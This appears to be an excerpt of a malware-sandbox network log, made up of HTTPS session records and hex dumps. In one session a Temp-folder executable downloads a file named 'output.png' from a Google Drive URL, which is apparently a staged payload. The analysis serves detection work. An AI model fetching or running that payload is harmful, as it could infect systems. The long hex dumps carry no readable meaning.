                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC4867INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                                                                                                                                        Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1323INData Raw: bb 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6
                                                                                                                                                                                                                                                                                        Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6
                                                                                                                                                                                                                                                                                        Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d
                                                                                                                                                                                                                                                                                        Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8
                                                                                                                                                                                                                                                                                        Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63
                                                                                                                                                                                                                                                                                        Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1
                                                                                                                                                                                                                                                                                        Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b
                                                                                                                                                                                                                                                                                        Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--|I<gR|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:23 UTC1390INData Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58
                                                                                                                                                                                                                                                                                        Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?|^x;cxM[]%8#pq3!gQv;ezF;_G3X


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        3192.168.2.1049883172.217.17.654438120C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:21 UTC192OUTGET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                                                                                                                                        User-Agent: FileDownloader
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC4915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Content-Length: 156917
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4T7BYIM2nc31FkkcTKvwZ_aUhNf2FC1NkKe6oOVJL6hd-mWg-j2z3pKOtUCCVftNYb0iQ
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:25 GMT
                                                                                                                                                                                                                                                                                        Expires: Thu, 12 Dec 2024 15:48:25 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                        X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC4915INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b6 00 00 01 b6 08 06 00 00 00 13 09 a3 70 00 00 80 00 49 44 41 54 78 9c ec dd 07 7c 14 65 fa 07 f0 df 33 9b 0a 09 bd 9d 15 44 20 64 77 36 80 d8 d0 53 9a dc 59 00 5b d6 ce a9 e7 e9 9d 05 b0 23 2a 4c c0 82 67 c5 72 96 bb bf 9e e8 a9 24 58 41 3d 95 66 c3 16 85 ec ec 12 8a 8a 9e 05 0b 9d 00 29 bb f3 fc 3f bb 49 ee 28 d9 64 76 b3 33 ef 6c f6 fd 7e 3e 7e 3e b2 bb 33 ef 93 64 77 9f 79 cb 3c 6f 06 24 49 b2 ce a8 d3 ba 82 c2 c7 2b 8c 61 0c 14 02 74 08 08 3d c0 68 0f 80 40 a8 02 d3 06 10 af 23 c6 2a 03 fc 11 80 25 58 f4 da cf a2 43 97 a4 54 45 a2 03 90 a4 36 67 cc 98 f6 08 e5 fa 88 30 01 c0 71 00 94 04 ce f2 11 13 3d 03 64 3e 87 85 65 5b 2d 88 52 92 da 2c 99 d8 24 29 59 4e 3c b1 03 ea 32 27 12 d3 24 00 dd 92
                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRpIDATx|e3D dw6SY[#*Lgr$XA=f)?I(dv3l~>~>3dwy<o$I+at=h@#*%XCTE6g0q=d>e[-R,$)YN<2'$
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC4868INData Raw: b8 8f 6d b0 aa aa 13 4c 25 b5 58 26 5c bf 63 68 76 d7 cd 7b 27 b5 86 36 04 d4 e8 92 a4 ff 71 b9 5c 31 df 83 59 59 59 09 ed b7 e6 76 bb ab 54 55 d5 5c 2e 97 4a f1 d7 58 ed 07 60 7e 43 79 ae c2 44 da 97 12 27 13 9b 43 31 33 05 02 81 09 86 61 7c 19 b9 02 8c e3 8a b1 d1 97 cc ec f3 7a bd a3 54 55 4d ca 0e c1 2e 97 ab c9 2f 08 22 11 c5 27 25 e9 7f 9a 9b 63 ab ae ae 6e d5 46 a2 85 85 85 6b 3d 1e 8f cf 30 8c d1 09 ec 8e d1 58 9e 6b 76 79 79 79 c7 d6 c4 21 99 27 13 9b 03 05 02 81 c3 03 81 c0 32 66 7e 3a c1 31 fe 92 9c 9c 1c 8f d7 eb 4d 6a 25 ff 70 38 dc e4 17 84 ec b1 49 a2 35 d7 63 cb cd cd 4d ca 0e d9 45 45 45 8b 36 6c d8 30 84 99 2f 03 f0 6b 1c 87 66 02 98 98 9d 9d fd 95 ae eb 93 4a 4b 4b e5 e7 c5 62 32 b1 39 c8 aa 55 ab f6 6b 28 83 f5 09 80 a3 e2 3c dc 00 a2
                                                                                                                                                                                                                                                                                        Data Ascii: mL%X&\chv{'6q\1YYYvTU\.JX`~CyD'C13a|zTUM./"'%cnFk=0Xkvyyy!'2f~:1Mj%p8I5cMEEE6l0/kfJKKb29Uk(<
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1322INData Raw: 53 a2 8c 51 20 10 18 bb 71 7b d5 a3 7f 7f 7b e9 fe cf bf ff 31 0c 13 c3 93 5d 3b e4 1b 63 06 b9 9f ef cf 35 17 6a 9a e6 8c 25 e4 a3 c6 17 82 30 48 61 2e 00 63 00 13 f6 03 a8 3d c0 1d 81 68 45 ff 1a 10 aa 86 f4 39 b8 5f df 5e 3d 3a 1c dc a3 1b 0e e9 d9 1d 45 bd 0f 42 7e 6e 4e a4 c7 36 d3 e3 f1 d8 ba 22 4f b8 52 2d 0b c0 53 00 9d 2b a0 f5 1d 60 f6 e1 2c ed 0d 01 6d ff 57 ea 24 b6 46 a5 33 fb 80 8d 1b 41 f8 03 80 9c 24 9c 31 08 c2 9d e0 81 2f a4 fb cd d7 66 04 02 81 a7 98 f9 c2 bd 1f 67 e6 81 5e af d7 f6 b1 f4 78 24 38 ec b8 25 72 2d bc 61 c3 86 47 46 8c 18 e1 8c 2f 7b 93 2a 2a 2a da 2b 8a 72 7d e0 bb 1f a6 ce 7a 71 41 a6 ff 1b 73 53 a0 9e 83 f6 af 3a a1 c8 f3 97 fb 26 5f fe ac e5 41 ee 6d ec d8 76 d8 49 a7 29 84 93 99 69 04 80 5e 89 9c 46 21 c2 c0 03 f6 43
                                                                                                                                                                                                                                                                                        Data Ascii: SQ q{{1];c5j%0Ha.c=hE9_^=:EB~nN6"OR-S+`,mW$F3A$1/fg^x$8%r-aGF/{***+r}zqAsS:&_AmvI)i^F!C
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: 64 c9 01 31 5f 38 fa d4 e1 44 ca 62 27 27 35 d4 6f 18 76 3e 6d aa 7b 13 27 9e d8 41 74 2c 52 eb a4 65 62 4b ab 6a 04 49 16 eb a2 40 51 14 5b 13 5b 45 45 c5 90 40 20 b0 ac 61 4b 19 b3 73 69 5f 30 73 a4 67 39 21 5d e6 d2 e2 e1 76 bb bf 54 55 f5 94 11 ea c0 71 2f df 34 e9 1b 33 7b bf ed aa ad c5 cb 1f 97 7b a7 fc df f3 df 4c 7b ec c9 07 96 2c 59 b2 67 f1 84 d1 e3 4e 26 e6 7f 03 e8 68 71 f8 49 c2 23 a9 36 eb 1d 99 dc 52 5b 5a 26 36 d9 63 4b 9c e8 1e 9b df ef ef ac eb fa 6c 45 51 3e 8d 63 2e 6d 33 80 c9 95 95 95 47 78 bd de 8f 2c 0e 31 e5 79 3c 9e f9 a1 ea ea c2 cb 7f 3f b2 64 de f5 57 d4 1c ef 1e d0 e2 31 5f ae ff d9 75 db bc d7 26 dd 31 ff ed 5f 1e 2d 7b e9 94 e8 83 23 c6 1f 49 4c 73 01 a4 da 3e 70 47 50 6d d6 ab 38 f1 c4 54 8b 5b 6a 60 45 69 2a c7 93 3d b6
                                                                                                                                                                                                                                                                                        Data Ascii: d1_8Db''5ov>m{'At,RebKjI@Q[[EE@ aKsi_0sg9!]vTUq/43{{L{,YgN&hqI#6R[Z&6cKlEQ>c.m3Gx,1y<?dW1_u&1_-{#ILs>pGPm8T[j`Ei*=
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d
                                                                                                                                                                                                                                                                                        Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8
                                                                                                                                                                                                                                                                                        Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
                                                                                                                                                                                                                                                                                        2024-12-12 15:48:25 UTC1390INData Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63
                                                                                                                                                                                                                                                                                        Data Ascii: ]a!]x*3qNJl4/^"{f:`(<213g*Wfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8|Ezqr=NKlnqP2z@2d3LJA|a:Fh!+h(p?a&Y`_x-a2yMc
